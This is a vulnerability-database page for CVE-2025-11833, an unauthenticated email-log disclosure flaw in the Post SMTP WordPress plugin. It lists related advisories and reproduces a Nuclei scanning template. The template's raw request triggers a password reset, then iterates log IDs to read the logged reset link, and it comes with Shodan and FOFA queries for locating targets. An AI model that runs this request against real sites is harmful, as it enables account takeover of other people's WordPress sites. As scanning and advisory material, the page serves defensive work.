Post SMTP <= 3.6.0 - Email Log Disclosure
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for CVE-2025-11833 | 3 Nov 202520:37 | – | githubexploit | |
| The vulnerability in the __construct function of the POST SMTP plugin of the WordPress content management system allows a hacker to elevate their privileges and expose sensitive information. | 8 Dec 202500:00 | – | bdu_fstec | |
| CVE-2025-11833 | 1 Nov 202510:18 | – | circl | |
| WordPress plugin Post SMTP 安全漏洞 | 1 Nov 202500:00 | – | cnnvd | |
| WordPress Post SMTP plugin Unauthorized Access to Data Vulnerability | 5 Nov 202500:00 | – | cnvd | |
| CVE-2025-11833 | 1 Nov 202503:34 | – | cve | |
| CVE-2025-11833 Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App <= 3.6.0 - Missing Authorization to Account Takeover via Unauthenticated Email Log Disclosure | 1 Nov 202503:34 | – | cvelist | |
| EUVD-2025-37413 | 1 Nov 202506:30 | – | euvd | |
| CVE-2025-11833-PoC | 9 Sep 202602:56 | – | kitploit | |
| CVE-2025-11833 | 1 Nov 202504:15 | – | nvd |
10
id: CVE-2025-11833
info:
name: Post SMTP <= 3.6.0 - Email Log Disclosure
author: Kazgangap
severity: critical
description: |
Post SMTP WordPress plugin <= 3.6.0 contains an unauthorized data access vulnerability caused by missing capability check in __construct function, letting unauthenticated attackers read arbitrary logged emails, exploit requires no authentication.
impact: |
Unauthenticated attackers can read sensitive logged emails, including password reset links, potentially leading to account takeover.
remediation: |
Update to the latest version beyond 3.6.0
reference:
- https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11833.md
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-smtp/post-smtp-complete-smtp-solution-with-logs-alerts-backup-smtp-mobile-app-360-missing-authorization-to-account-takeover-via-unauthenticated-email-log-disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2025-11833
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-11833
epss-score: 0.51005
epss-percentile: 0.98858
cwe-id: CWE-862
cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpexperts
product: post_smtp_mailer
framework: wordpress
shodan-query: http.html:/wp-content/plugins/post-smtp
fofa-query: body=/wp-content/plugins/post-smtp
tags: cve,cve2025,wp,wp-plugin,wordpress,post-smtp,exposure,vkev,fuzz,vuln
variables:
username: "{{username}}"
http:
- raw:
- |
POST /wp-login.php?action=lostpassword&page=postman_email_log&view=log&log_id={{log_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
user_login={{username}}&redirect_to=&wp-submit=Get+New+Password
payloads:
log_id: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "your password, visit the following address:", "key=", "Username: {{username}}")'
condition: and
# digest: 4b0a00483046022100d127cc75d85a43a15af3c09ff6f37d5f341dc42fe2dfd279d1326187bb7157a8022100ac9fff0fd736d4d1161d90228254f7860f091497b881bd8cc994e1bf220f8d59:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Nov 2025 14:18Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.51005
SSVC